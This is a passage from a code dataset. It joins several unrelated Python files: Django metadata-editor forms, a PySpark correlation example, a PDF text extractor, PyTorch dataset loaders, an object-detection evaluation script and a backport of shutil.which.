#{}\".format(obj.title, obj.id)\n\n\nclass ReferenceSystemModelMultipleChoiceField(ModelMultipleChoiceField):\n def label_from_instance(self, obj):\n \"\"\"\n we need to override this function to show the id of the metadata object,\n so the user can differentiate the results where title is equal.\n \"\"\"\n return f\"{obj.prefix}{obj.code}\"\n\n\nclass DatasetIdentificationForm(MrMapWizardForm):\n title = forms.CharField(label=_('Title'), )\n abstract = forms.CharField(label=_('Abstract'), )\n language_code = forms.ChoiceField(label=_('Language'), choices=ISO_19115_LANG_CHOICES)\n character_set_code = forms.ChoiceField(label=_('Character Encoding'), choices=Dataset.CHARACTER_SET_CHOICES)\n date_stamp = forms.DateTimeField(label=_('Metadata creation date'),\n widget=BootstrapDatePickerInput())\n reference_system = ReferenceSystemModelMultipleChoiceField(\n queryset=ReferenceSystem.objects.none(),\n widget=autocomplete.ModelSelect2Multiple(\n url='editor:reference-system-autocomplete',\n attrs={\n \"data-containercss\": {\n \"height\": \"3em\",\n \"width\": \"3em\",\n }\n }\n ),\n required=False, )\n\n additional_related_objects = MetadataModelMultipleChoiceField(\n queryset=Metadata.objects.none(),\n widget=autocomplete.ModelSelect2Multiple(\n url='editor:metadata-autocomplete',\n\n ),\n required=False, )\n\n created_by = forms.ModelChoiceField(\n label=_(\"Create with group\"),\n widget=forms.Select(attrs={'class': 'auto_submit_item'}),\n queryset=MrMapGroup.objects.none(),\n to_field_name='id',\n initial=1\n )\n\n def __init__(self, *args, **kwargs):\n super(DatasetIdentificationForm, self).__init__(has_autocomplete_fields=True,\n *args,\n **kwargs)\n\n self.fields['additional_related_objects'].queryset = user_helper.get_user(self.request).get_metadatas_as_qs(\n type=MetadataEnum.DATASET, inverse_match=True)\n self.fields['reference_system'].queryset = ReferenceSystem.objects.all()\n\n user = user_helper.get_user(request=kwargs.pop(\"request\"))\n user_groups = user.groups.filter(mrmapgroup__is_public_group=False)\n self.fields[\"created_by\"].queryset = user_groups\n self.fields[\"created_by\"].initial = user_groups.first()\n\n if self.instance_id:\n metadata = Metadata.objects.get(pk=self.instance_id)\n dataset = Dataset.objects.get(pk=metadata.dataset.id)\n self.fields['title'].initial = metadata.title\n self.fields['abstract'].initial = metadata.abstract\n self.fields['reference_system'].initial = metadata.reference_system.all()\n self.fields['date_stamp'].initial = dataset.date_stamp\n self.fields['language_code'].initial = dataset.language_code\n self.fields['character_set_code'].initial = dataset.character_set_code\n\n self.fields['additional_related_objects'].queryset = self.fields[\n 'additional_related_objects'].queryset.exclude(id=self.instance_id)\n\n exclusions = {'to_metadatas__origin': ResourceOriginEnum.CAPABILITIES.value}\n related_metadatas = metadata.get_related_metadatas(exclusions=exclusions)\n self.fields['additional_related_objects'].initial = related_metadatas\n\n\nclass DatasetClassificationForm(MrMapWizardForm):\n keywords = ModelMultipleChoiceField(\n label=_('Keywords'),\n queryset=Keyword.objects.all(),\n widget=autocomplete.ModelSelect2Multiple(\n url='editor:keyword-autocomplete',\n attrs={\n \"data-containercss\": {\n \"height\": \"3em\",\n \"width\": \"3em\",\n },\n },\n ),\n required=False, )\n categories = ModelMultipleChoiceField(\n label=_('Categories'),\n queryset=Category.objects.all(),\n widget=autocomplete.ModelSelect2Multiple(\n url='editor:category-autocomplete',\n attrs={\n \"data-containercss\": {\n \"height\": \"3em\",\n \"width\": \"3em\",\n },\n },\n ),\n required=False, )\n\n def __init__(self, *args, **kwargs):\n super(DatasetClassificationForm, self).__init__(\n has_autocomplete_fields=True,\n *args,\n **kwargs, )\n\n if self.instance_id:\n metadata = Metadata.objects.get(id=self.instance_id)\n self.fields['keywords'].initial = metadata.keywords.all()\n self.fields['categories'].initial = metadata.categories.all()\n\n\nclass DatasetLicenseConstraintsForm(MrMapWizardForm):\n licence = forms.ModelChoiceField(\n label=_('Terms of use'),\n required=False,\n queryset=Licence.objects.filter(is_active=True),\n help_text=Licence.get_descriptions_help_text()\n )\n access_constraints = forms.CharField(\n label=_('Access constraints'),\n required=False,\n widget=forms.Textarea()\n )\n\n def __init__(self, *args, **kwargs):\n super(DatasetLicenseConstraintsForm, self).__init__(*args, **kwargs)\n\n if self.instance_id:\n metadata = Metadata.objects.get(id=self.instance_id)\n self.fields['licence'].initial = metadata.licence\n self.fields['access_constraints'].initial = metadata.access_constraints\n\n\nclass DatasetSpatialExtentForm(ModelForm):\n bounding_geometry = forms.CharField(label=_('Bounding box'),\n required=False,\n widget=LeafletWidget())\n\n class Meta:\n model = Metadata\n fields = ('bounding_geometry',)\n\n\nclass DatasetQualityForm(MrMapWizardForm):\n maintenance_and_update_frequency = forms.ChoiceField(\n label=_('Maintenance and update frequency'),\n choices=Dataset.UPDATE_FREQUENCY_CHOICES\n )\n lineage_statement = forms.CharField(\n label=_('Lineage Statement'),\n required=False,\n widget=forms.Textarea()\n )\n\n def __init__(self, *args, **kwargs):\n super(DatasetQualityForm, self).__init__(*args, **kwargs)\n\n if self.instance_id:\n metadata = Metadata.objects.get(id=self.instance_id)\n dataset = Dataset.objects.get(id=metadata.dataset.id)\n self.fields['lineage_statement'].initial = dataset.lineage_statement\n self.fields['maintenance_and_update_frequency'].initial = dataset.update_frequency_code\n\n\nclass DatasetResponsiblePartyForm(MrMapWizardForm):\n organization = forms.ModelChoiceField(\n label=_('Organization'),\n queryset=Organization.objects.none(),\n required=False,\n help_text=_(\n 'Select an other Organization to overwrite the original. You can select your organization and the ones you are allowed to publish for.')\n )\n\n def __init__(self, *args, **kwargs):\n user = user_helper.get_user(kwargs.get(\"request\"))\n user_groups = user.groups.all()\n if 'instance_id' in kwargs and kwargs['instance_id'] is not None:\n metadata = Metadata.objects.get(id=kwargs['instance_id'])\n init_organization = Organization.objects.filter(id=metadata.contact.id)\n organizations = Organization.objects.filter(\n Q(is_auto_generated=False) &\n Q(publishers__in=user_groups) |\n Q(id=user.organization.id)\n ) | init_organization\n else:\n organizations = Organization.objects.filter(\n Q(is_auto_generated=False) &\n Q(publishers__in=user_groups) |\n Q(id=user.organization.id)\n )\n\n super(DatasetResponsiblePartyForm, self).__init__(*args, **kwargs)\n\n self.fields['organization'].queryset = organizations\n\n\nclass RestoreDatasetMetadata(MrMapConfirmForm):\n def __init__(self, instance, *args, **kwargs):\n self.instance = instance\n super(RestoreDatasetMetadata, self).__init__(*args, **kwargs)\n\n def process_restore_dataset_metadata(self):\n ext_auth = self.instance.get_external_authentication_object()\n\n if not self.instance.is_custom:\n messages.add_message(self.request, messages.INFO, METADATA_IS_ORIGINAL)\n return HttpResponseRedirect(reverse(self.request.GET.get('current-view', 'home')), status=303)\n\n if self.instance.is_custom:\n self.instance.restore(self.instance.identifier, external_auth=ext_auth)\n self.instance.save()\n\n messages.add_message(self.request, messages.SUCCESS, METADATA_RESTORING_SUCCESS)\n user_helper.create_group_activity(self.instance.created_by, self.requesting_user, SERVICE_MD_RESTORED,\n \"{}\".format(self.instance.title, ))\n\n\nclass GeneralAccessSettingsForm(forms.ModelForm):\n class Meta:\n model = Metadata\n fields = ('use_proxy_uri', 'log_proxy_access', 'is_secured')\n labels = {\n 'use_proxy_uri': _(\"Use proxy\"),\n 'log_proxy_access': _(\"Log proxy activity\"),\n 'is_secured': _(\"Restrict access\"),\n }\n help_texts = {\n 'use_proxy_uri': _('Activate to reroute all traffic for this service on MrMap.'),\n 'log_proxy_access': _('Activate to log every traffic activity for this service.'),\n 'is_secured': _('Activate to restrict access on this service')\n }\n widgets = {\n 'is_secured': forms.CheckboxInput(attrs={'class': 'auto_submit_item', }),\n }\n\n def __init__(self, *args, **kwargs):\n super(GeneralAccessSettingsForm, self).__init__(*args, **kwargs)\n\n def clean(self):\n cleaned_data = super().clean()\n use_proxy = cleaned_data.get(\"use_proxy_uri\")\n log_proxy = cleaned_data.get(\"log_proxy_access\")\n restrict_access = cleaned_data.get(\"is_secured\")\n\n # log_proxy and restrict_access can only be activated in combination with use_proxy!\n if log_proxy and not use_proxy or restrict_access and not use_proxy:\n self.add_error(\"use_proxy_uri\", forms.ValidationError(\n _('Log proxy or restrict access without using proxy is\\'nt possible!')))\n\n # raise Exception if user tries to deactivate an external authenticated service -> not allowed!\n if self.instance.has_external_authentication and not use_proxy:\n raise AssertionError(SECURITY_PROXY_DEACTIVATING_NOT_ALLOWED)\n\n return cleaned_data\n\n def save(self, commit=True):\n # todo: just save the fields and implement a signal which detects if one of the three fields become changed.\n # the signal can then fire the async task.\n # todo: maybe we could merge the async_proccess from step 1 and two of the wizard\n use_proxy = self.cleaned_data.get(\"use_proxy_uri\", False)\n log_proxy = self.cleaned_data.get(\"log_proxy_access\", False)\n restrict_access = self.cleaned_data.get(\"is_secured\", False)\n\n async_process_securing_access.apply_async((self.instance.id,\n use_proxy,\n log_proxy,\n restrict_access), countdown=settings.CELERY_DEFAULT_COUNTDOWN)\n\n\nclass AllowedOperationForm(forms.ModelForm):\n class Meta:\n model = AllowedOperation\n fields = ('operations', 'allowed_groups', 'allowed_area', 'root_metadata')\n\n widgets = {\n 'operations': autocomplete.ModelSelect2Multiple(\n url='editor:operations-autocomplete',\n attrs={\n \"data-containerCss\": {\n \"height\": \"3em\",\n \"width\": \"3em\",\n }\n },\n ),\n 'allowed_groups': autocomplete.ModelSelect2Multiple(\n url='editor:groups',\n attrs={\n \"data-containerCss\": {\n \"height\": \"3em\",\n \"width\": \"3em\",\n }\n },\n ),\n 'allowed_area': LeafletWidget(attrs={\n 'map_height': '500px',\n 'map_width': '100%',\n # 'display_raw': 'true',\n 'map_srid': 4326,\n }),\n 'root_metadata': forms.HiddenInput(),\n }\n","sub_path":"mrmap/editor/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":18250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"173968345","text":"# --------------------------------------------------------\n# PYTHON PROGRAM\n# Here is where we are going to define our set of...\n# - Imports\n# - Global Variables\n# - Functions\n# ...to achieve the functionality required.\n# When executing > python 'this_file'.py in a terminal,\n# the Python interpreter will load our program,\n# but it will execute nothing yet.\n# --------------------------------------------------------\n\nimport pyspark\n\nimport pyspark.ml.stat\nimport pyspark.ml.linalg\n\n# ------------------------------------------\n# FUNCTION process_line\n# ------------------------------------------\ndef process_line(line):\n # 1. We create the output variable\n res = None\n\n # 2. We remove the end of line character\n line = line.replace(\"\\n\", \"\")\n\n # 3. We split the line by tabulator characters\n params = line.split(\";\")\n\n # 4. We turn it into a Vector of integers\n size = len(params)\n for index in range(size):\n if (params[index] != \"\"):\n params[index] = int(params[index])\n else:\n params[index] = 0\n my_vector = pyspark.ml.linalg.Vectors.dense(params)\n\n # 5. We assign res properly\n res = (my_vector, )\n\n # 6. We return res\n return res\n\n# ------------------------------------------\n# FUNCTION my_main\n# ------------------------------------------\ndef my_main(sc, spark, my_dataset_dir, correlation_method):\n # 1. Operation C1: We create the RDD from the dataset\n inputRDD = sc.textFile(my_dataset_dir)\n\n # 2. Operation T1: We get an RDD of tuples\n infoRDD = inputRDD.map(process_line)\n\n # 3. Operation C2: We turn the RDD into a DF\n inputDF = spark.createDataFrame(infoRDD, [\"features\"])\n\n # 4. Operation T2: We compute pearson_resultDF\n correlation_resultDF = pyspark.ml.stat.Correlation.corr(inputDF, \"features\", correlation_method)\n\n # 5. Operation A1: We take the result from it\n correlation_matrix = correlation_resultDF.head()\n print(correlation_matrix)\n\n# ---------------------------------------------------------------\n# PYTHON EXECUTION\n# This is the main entry point to the execution of our program.\n# It provides a call to the 'main function' defined in our\n# Python program, making the Python interpreter to trigger\n# its execution.\n# ---------------------------------------------------------------\nif __name__ == '__main__':\n # 1. We use as many input arguments as needed\n correlation_method = \"pearson\"\n #correlation_method = \"spearman\"\n\n #dataset_file_name = \"pearson_2_vars_dataset.csv\"\n dataset_file_name = \"pearson_3_vars_dataset.csv\"\n #dataset_file_name = \"spearman_2_vars_dataset.csv\"\n\n # 2. Local or Databricks\n local_False_databricks_True = True\n\n # 3. We set the path to my_dataset and my_result\n my_local_path = \"../../../../\"\n my_databricks_path = \"/\"\n\n my_dataset_dir = \"FileStore/tables/5_Spark_MachineLearning_Libs/1_Basic_Statistics/\" + dataset_file_name\n\n if local_False_databricks_True == False:\n my_dataset_dir = my_local_path + my_dataset_dir\n else:\n my_dataset_dir = my_databricks_path + my_dataset_dir\n\n # 4. We configure the Spark Context\n sc = pyspark.SparkContext.getOrCreate()\n sc.setLogLevel('WARN')\n\n # 4. We configure the Spark Session\n # 5. We configure the Spark Session\n spark = pyspark.sql.SparkSession.builder.getOrCreate()\n spark.sparkContext.setLogLevel('WARN')\n print(\"\\n\\n\\n\")\n\n # 5. We call to our main function\n my_main(sc, spark, my_dataset_dir, correlation_method)","sub_path":"Big_Data/L15-25_Spark_Environment/Workspace/5_Spark_MachineLearning_Libs/5_2_DataFrames_Based_API/1_Basic_Statistics/p01_correlation.py","file_name":"p01_correlation.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"419107485","text":"from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter\nfrom pdfminer.converter import TextConverter\nfrom pdfminer.layout import LAParams\nfrom pdfminer.pdfpage import PDFPage\nfrom io import StringIO\ninput_path = \"sample.pdf\"\noutput_path = \"result.txt\"\nrsrcmgr = PDFResourceManager()\n# codec = 'utf-8'\ncodec = 'cp932'\nparams = LAParams()\ntext = \"\"\nwith StringIO() as output:\n device = TextConverter(rsrcmgr, output, codec=codec, laparams=params)\n with open(input_path, 'rb') as input:\n interpreter = PDFPageInterpreter(rsrcmgr, device)\n for page in PDFPage.get_pages(input):\n interpreter.process_page(page)\n text += output.getvalue()\n device.close()\ntext = text.strip()\nprint(f'output: {text}')\n\nwith open(output_path, \"wb\") as f:\n f.write(text.encode('utf-8', \"ignore\"))\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"455015585","text":"import abc\nimport os\n\nimport numpy as np\nimport scipy.io\nimport torch\nimport torch.utils.data as data\n\n\nclass DataConfig:\n \"\"\"\n Data class holding configuration information about a dataset\n \"\"\"\n\n def __init__(self, sort_data=True, predict_difference=True, predict_all_dims=True, force_affine=False,\n expanded_input=False, y_in_x_space=True):\n \"\"\"\n\n :param sort_data: Whether the experiments (data between files) are sorted (by random seed id)\n :param predict_difference: Whether the prediction should be the state difference or the next state\n :param predict_all_dims: Whether the prediction should include all state dimensions (some datasets do this regardless)\n :param force_affine: Whether a column of 1s should be added to XU to make the dataset effectively affine\n :param expanded_input: Whether the input has extra dimensions (packed in control dimension)\n :param y_in_x_space: Whether the output is in the same space as state; if not then a lot of assumptions will not hold\n \"\"\"\n self.sort_data = sort_data\n self.predict_difference = predict_difference\n self.predict_all_dims = predict_all_dims\n self.force_affine = force_affine\n self.expanded_input = expanded_input\n self.y_in_x_space = y_in_x_space\n # unknown quantities until we encounter data (optional)\n self.nx = None\n self.nu = None\n self.ny = None\n # sometimes the full input is larger than xu (such as with expanded input)\n self.n_input = None\n\n def load_data_info(self, x, u=None, y=None, full_input=None):\n self.nx = x.shape[1]\n if u is not None:\n self.nu = u.shape[1]\n if y is not None:\n self.ny = y.shape[1]\n if full_input is not None:\n self.n_input = full_input.shape[1]\n if self.expanded_input and full_input is None:\n raise RuntimeError(\"Need to load full input with expanded input\")\n\n def input_dim(self):\n if not self.nx:\n raise RuntimeError(\"Need to load data info first before asking for input dim\")\n if self.n_input:\n return self.n_input\n # else assume we're inputting xu\n ni = self.nx\n if self.nu:\n ni += self.nu\n return ni\n\n def options(self):\n return self.sort_data, self.predict_difference, self.predict_all_dims, self.force_affine, \\\n self.expanded_input, self.y_in_x_space\n\n def __str__(self):\n return \"i{}_o{}_s{}_pd{}_pa{}_a{}_e{}_y{}\".format(self.input_dim(), self.ny,\n *(int(config) for config in self.options()))\n\n def __repr__(self):\n return \"DataConfig(sort_data={}, predict_difference={}, predict_all_dims={}, force_affine={}, \" \\\n \"expanded_input={}, y_in_x_space={})\".format(*self.options())\n\n\nclass DataLoader(abc.ABC):\n \"\"\"\n Driver for loading a dataset from file.\n Each dataset should subclass DataLoader and specialize process file raw data to saved content.\n \"\"\"\n\n def __init__(self, file_cfg=None, config=DataConfig()):\n if file_cfg is None:\n raise RuntimeError(\"Incomplete specification of DataLoader\")\n self.file_cfg = {key: value for key, value in file_cfg.__dict__.items() if\n not key.startswith('_') and isinstance(value, str)}\n self.config = config\n\n @abc.abstractmethod\n def _process_file_raw_data(self, d):\n \"\"\"\n Turn a file's dictionary content into a data sequence, each element of which has the same number of rows\n :param d: file's dictionary content\n :return: tuple of data sequence\n \"\"\"\n\n def load_file(self, full_filename, data):\n raw_data = scipy.io.loadmat(full_filename)\n file_data = self._process_file_raw_data(raw_data)\n if data is None:\n data = list(file_data)\n else:\n for i in range(len(data)):\n data[i] = np.row_stack((data[i], file_data[i]))\n return data\n\n def load(self, dir, override_config=None):\n if override_config:\n self.config = override_config\n data = None\n full_dir = os.path.join(self.file_cfg['DATA_DIR'], dir)\n\n if os.path.isfile(full_dir):\n data = self.load_file(full_dir, data)\n else:\n files = os.listdir(full_dir)\n # consistent with the way MATLAB loads files\n if self.config.sort_data:\n files = sorted(files)\n\n for file in files:\n full_filename = '{}/{}'.format(full_dir, file)\n if os.path.isdir(full_filename):\n continue\n data = self.load_file(full_filename, data)\n return data\n\n\ndef make_affine(X):\n N = X.shape[0]\n return torch.cat((X, torch.ones((N, 1), dtype=X.dtype)), dim=1)\n\n\nclass RandomNumberDataset(data.Dataset):\n def __init__(self, produce_output, num=1000, low=-1, high=1, input_dim=1):\n r = high - low\n self.x = torch.rand((num, input_dim)) * r / 2 + (low + high) / 2\n self.y = produce_output(self.x)\n super(RandomNumberDataset, self).__init__()\n\n def __len__(self):\n return len(self.x)\n\n def __getitem__(self, idx):\n return self.x[idx], self.y[idx]\n\n def get_input(self):\n return self.x\n\n def get_output(self):\n return self.y\n\n\nclass SimpleXUYDataset(data.Dataset):\n def __init__(self, XU, Y):\n self.XU = XU\n self.Y = Y\n super(SimpleXUYDataset, self).__init__()\n\n def __len__(self):\n return len(self.XU)\n\n def __getitem__(self, idx):\n return self.XU[idx], self.Y[idx]\n\n\nclass SimpleDataset(data.Dataset):\n def __init__(self, *sequences):\n self.sequences = sequences\n\n def __len__(self):\n return len(self.sequences[0])\n\n def __getitem__(self, idx):\n return tuple(sequence[idx] if sequence is not None else [] for sequence in self.sequences)\n\n\nclass IndexedDataset(SimpleDataset):\n \"\"\"Same as before, but with last element as the index of the data point for using in Dataloaders\"\"\"\n\n def __getitem__(self, idx):\n return tuple(sequence[idx] if sequence is not None else [] for sequence in self.sequences) + (idx,)\n\n\nclass LoaderXUYDataset(data.Dataset):\n def __init__(self, loader: DataLoader, dirs=('raw',), filter_on_labels=None, max_num=None,\n config=DataConfig(), device=\"cpu\"):\n if type(dirs) is str:\n dirs = [dirs]\n self.XU = None\n self.Y = None\n self.labels = None\n for dir in dirs:\n XU, Y, labels = loader.load(dir, config)\n if self.XU is None:\n self.XU = XU\n self.Y = Y\n self.labels = labels\n else:\n self.XU = np.row_stack((self.XU, XU))\n self.Y = np.row_stack((self.Y, Y))\n self.labels = np.row_stack((self.labels, labels[:, :self.labels.shape[1]]))\n self._convert_types(device)\n if filter_on_labels:\n self.XU, self.Y, self.labels = filter_on_labels(self.XU, self.Y, self.labels)\n\n if config.force_affine:\n self.XU = make_affine(self.XU)\n\n if max_num is not None:\n self.XU = self.XU[:max_num]\n self.Y = self.Y[:max_num]\n self.labels = self.labels[:max_num]\n\n super().__init__()\n\n def _convert_types(self, device):\n self.XU = torch.from_numpy(self.XU).to(device=device, dtype=torch.double)\n self.Y = torch.from_numpy(self.Y).to(device=device, dtype=torch.double)\n self.labels = torch.from_numpy(self.labels).to(device=device, dtype=torch.double)\n\n def __len__(self):\n return self.XU.shape[0]\n\n def __getitem__(self, idx):\n return self.XU[idx], self.Y[idx], self.labels[idx]\n\n\ndef split_train_validation(dataset, validation_ratio=0.1):\n # consider giving a shuffle (with np.random.shuffle()) option to permute the data before viewing\n offset = int(len(dataset) * (1 - validation_ratio))\n return data.Subset(dataset, range(0, offset)), data.Subset(dataset, range(offset, len(dataset)))\n\n\ndef merge_data_in_dir(config, dir, out_filename, sort=True):\n full_dir = os.path.join(config.DATA_DIR, dir)\n\n files = os.listdir(full_dir)\n if sort:\n files = sorted(files)\n\n data = None\n for file in files:\n full_filename = '{}/{}'.format(full_dir, file)\n raw_data = scipy.io.loadmat(full_filename)\n if data is None:\n data = raw_data\n else:\n for key in raw_data.keys():\n data[key] = np.row_stack((data[key], raw_data[key]))\n merged_filename = '{}/{}.mat'.format(config.DATA_DIR, out_filename)\n scipy.io.savemat(merged_filename, data)\n","sub_path":"src/arm_pytorch_utilities/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":8889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"519804098","text":"# Instead just add darknet.py to somewhere in your python path\n# OK actually that might not be a great idea, idk, work in progress\n# Use at your own risk. or don't, i don't care\n\nimport xml.etree.ElementTree as ET\nimport os\nimport cv2\nimport sqlite3 as db\nimport argparse\nimport matplotlib as mpl\nif os.environ.get('DISPLAY', '') == '':\n print('no display found. Using non-interactive Agg backend')\n mpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport pickle\n\n\nRED = (0, 0, 255)\nGREEN = (0, 255, 0)\nBLUE = (255, 0, 0)\n\n\nclass Box(object):\n \"\"\"docstring for Box\"\"\"\n\n def __init__(self, cls, x_min, x_max, y_min, y_max, confidence=None):\n self.cls = cls\n self.x_min = x_min\n self.x_max = x_max\n self.y_min = y_min\n self.y_max = y_max\n self.confidence = confidence\n\n\ndef get_GT_boxes(label_filepath):\n in_file = open(os.path.join(label_filepath), 'r')\n tree = ET.parse(in_file)\n root = tree.getroot()\n boxes = []\n for obj in root.iter('object'):\n xmlbox = obj.find('bndbox')\n if obj.find('name').text == 'boat':\n boxes.append(Box(obj.find('name').text, float(xmlbox.find('xmin').text), float(\n xmlbox.find('xmax').text), float(xmlbox.find('ymin').text), float(xmlbox.find('ymax').text)))\n return boxes\n\n\ndef get_intersected_area(box1, box2):\n dx = min(box1.x_max, box2.x_max) - max(box1.x_min, box2.x_min)\n dy = min(box1.y_max, box2.y_max) - max(box1.y_min, box2.y_min)\n if dy <= 0 or dx <= 0:\n return -1\n else:\n return dx * dy\n\n\ndef get_iou(box1, box2):\n area_box1 = (box1.x_max - box1.x_min) * (box1.y_max - box1.y_min)\n area_box2 = (box2.x_max - box2.x_min) * (box2.y_max - box2.y_min)\n intersected_area = get_intersected_area(box1, box2)\n # print(intersected_area)\n if intersected_area == -1:\n return -1\n else:\n return intersected_area / (area_box1 + area_box2 - intersected_area)\n\n\ndef valid_detection(detected_box, gt_box, iou_thresh=0.5):\n return get_iou(detected_box, gt_box) >= iou_thresh\n\n\ndef get_detections_stats(conn, data_path, iou_thresh, confidence_thresh=0.25):\n true_positives = 0\n num_detections = 0\n num_gt_boxes = 0\n c = conn.cursor()\n test_file = open(os.path.join(data_path, 'model', 'test.txt'), 'r')\n image_filepaths = test_file.readlines()\n test_file.close()\n for img in image_filepaths:\n gt_boxes = get_GT_boxes(os.path.join((img.strip()[:-4] + '.xml')))\n c.execute('SELECT * FROM detections WHERE image_name=? and confidence>=? and class_name=?',\n (img.strip(), confidence_thresh, 'boat'))\n detections = c.fetchall()\n num_detections += len(detections)\n for gt_box in gt_boxes:\n for i in range(len(detections) - 1, -1, -1):\n detected_box = Box(detections[i][5], detections[i][1], detections[i]\n [2], detections[i][3], detections[i][4], detections[i][6])\n if detected_box.confidence >= confidence_thresh:\n if valid_detection(detected_box, gt_box, iou_thresh=iou_thresh):\n true_positives += 1\n detections.remove(detections[i])\n break\n num_gt_boxes += len(gt_boxes)\n print('TP: ', true_positives, ' num_detections: ',\n num_detections, ' num_gt: ', num_gt_boxes)\n return [true_positives, num_detections, num_gt_boxes]\n\n\ndef get_precision_recall(conn, data_path, iou_thresh, confidence_thresh=0.25):\n [true_positives, num_detections, num_gt_boxes] = get_detections_stats(conn, data_path, iou_thresh, confidence_thresh)\n precision = 0\n if num_detections > 0:\n precision = float(true_positives) / float(num_detections)\n recall = 0\n if num_gt_boxes > 0:\n recall = float(true_positives) / float(num_gt_boxes)\n return (precision, recall)\n\n\ndef get_confusion_matrix(conn, data_path, iou_thresh, confidence_thresh=0.25):\n [true_positives, num_detections, num_gt_boxes] = get_detections_stats(conn, data_path, iou_thresh, confidence_thresh)\n false_positives = num_detections - true_positives\n false_negatives = num_gt_boxes - true_positives\n file = open(os.path.join(data_path, 'results', 'confusion_matrix.txt'), 'w')\n file.write('true_positives = ' + str(true_positives) + '\\n')\n file.write('false_positives = ' + str(false_positives) + '\\n')\n file.write('false_negatives = ' + str(false_negatives) + '\\n')\n file.write('num_detections = ' + str(num_detections) + '\\n')\n file.write('num_gt_boxes = ' + str(num_gt_boxes) + '\\n')\n file.close()\n return [true_positives, false_positives, false_negatives]\n\n\ndef save_images_with_boxes(conn, data_path, conf_thresh=0.25):\n c = conn.cursor()\n test_file = open(os.path.join(data_path, 'model', 'test.txt'), 'r')\n image_filepaths = test_file.readlines()\n test_file.close()\n i = 0\n for img in image_filepaths:\n img_name = img.strip().split('/')[-1]\n gt_boxes = get_GT_boxes(os.path.join(\n '', (img.strip()[:-4] + '.xml')))\n c.execute('SELECT * FROM detections WHERE image_name=? AND confidence>=?',\n (img.strip(), conf_thresh))\n detections = c.fetchall()\n image = cv2.imread(img.strip())\n print(img.strip())\n if image is None:\n print('No image')\n exit()\n for box in gt_boxes:\n cv2.rectangle(image, (int(box.x_min), int(box.y_max)),\n (int(box.x_max), int(box.y_min)), GREEN, 6)\n for box in detections:\n if (box[5] == 'building'):\n color = BLUE\n else:\n color = RED\n cv2.rectangle(image, (int(box[1]), int(box[3])),\n (int(box[2]), int(box[4])), color, 6)\n cv2.imwrite(os.path.join(data_path, 'results',\n img_name), image)\n i += 1\n\n\ndef write_prec_recall_to_file(data_path, precisions, recalls, name='SSD'):\n file = open(os.path.join(data_path, 'results', 'prec_recalls.txt'), 'w')\n file.write(name + '\\n')\n for i in range(len(precisions)):\n file.write(str(precisions[i]))\n if i != len(precisions):\n file.write(' ')\n file.write('\\n')\n for i in range(len(recalls)):\n file.write(str(recalls[i]))\n if i != len(recalls):\n file.write(' ')\n file.write('\\n')\n file.close()\n\n\ndef main(data_path):\n conn = db.connect(os.path.join(data_path, 'results', 'detections.db'))\n save_images_with_boxes(conn, data_path)\n conf_threshs = [x * 0.01 for x in range(0, 100)]\n precisions = []\n recalls = []\n for conf_thresh in conf_threshs:\n (precision, recall) = get_precision_recall(\n conn, data_path, 0.5, conf_thresh)\n precisions.append(precision)\n recalls.append(recall)\n print(precisions)\n print(recalls)\n write_prec_recall_to_file(data_path, precisions, recalls)\n get_confusion_matrix(conn, data_path, 0.5)\n # print(get_precision_recall(conn, data_path, 0.5))\n plt.plot(recalls, precisions)\n plt.grid(True)\n plt.xlabel('Recall')\n plt.ylabel('Precision')\n plt.savefig(os.path.join(data_path, 'results', 'prec_recall.png'))\n conn.close()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Input path to darknet')\n parser.add_argument('DATA_PATH', type=str, nargs=1,\n help='Set path to data folder, containg datasets')\n args = parser.parse_args()\n DATA_PATH = args.DATA_PATH[0]\n main(DATA_PATH)\n","sub_path":"ssd/test_ssd.py","file_name":"test_ssd.py","file_ext":"py","file_size_in_byte":7646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"310381267","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/local/lib/python2.7/dist-packages/nori/which.py\n# Compiled at: 2013-10-03 18:50:13\n\"\"\"\nBackport of Python 3.3's shutil.which().\nRequires 2.6+, for sets.\n\"\"\"\nimport sys\nif sys.hexversion >= 50528256:\n from shutil import which\nelse:\n import os\n\n def which(cmd, mode=os.F_OK | os.X_OK, path=None):\n \"\"\"Given a command, mode, and a PATH string, return the path which\n conforms to the given mode on the PATH, or None if there is no such\n file.\n\n `mode` defaults to os.F_OK | os.X_OK. `path` defaults to the result\n of os.environ.get(\"PATH\"), or can be overridden with a custom search\n path.\n\n \"\"\"\n\n def _access_check(fn, mode):\n return os.path.exists(fn) and os.access(fn, mode) and not os.path.isdir(fn)\n\n if os.path.dirname(cmd):\n if _access_check(cmd, mode):\n return cmd\n return\n if path is None:\n path = os.environ.get('PATH', os.defpath)\n if not path:\n return\n else:\n path = path.split(os.pathsep)\n if sys.platform == 'win32':\n if os.curdir not in path:\n path.insert(0, os.curdir)\n pathext = os.environ.get('PATHEXT', '').split(os.pathsep)\n if any(cmd.lower().endswith(ext.lower()) for ext in pathext):\n files = [\n cmd]\n else:\n files = [ cmd + ext for ext in pathext ]\n else:\n files = [\n cmd]\n seen = set()\n for dir in path:\n normdir = os.path.normcase(dir)\n if normdir not in seen:\n seen.add(normdir)\n for thefile in files:\n name = os.path.join(dir, thefile)\n if _access_check(name, mode):\n return name\n\n return","sub_path":"pycfiles/nori-1.0.linux-x86_64.tar/which.py","file_name":"which.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"368220650","text":"from rest_framework import viewsets, permissions\n\nfrom . import serializers\nfrom . import models\n\n\nclass 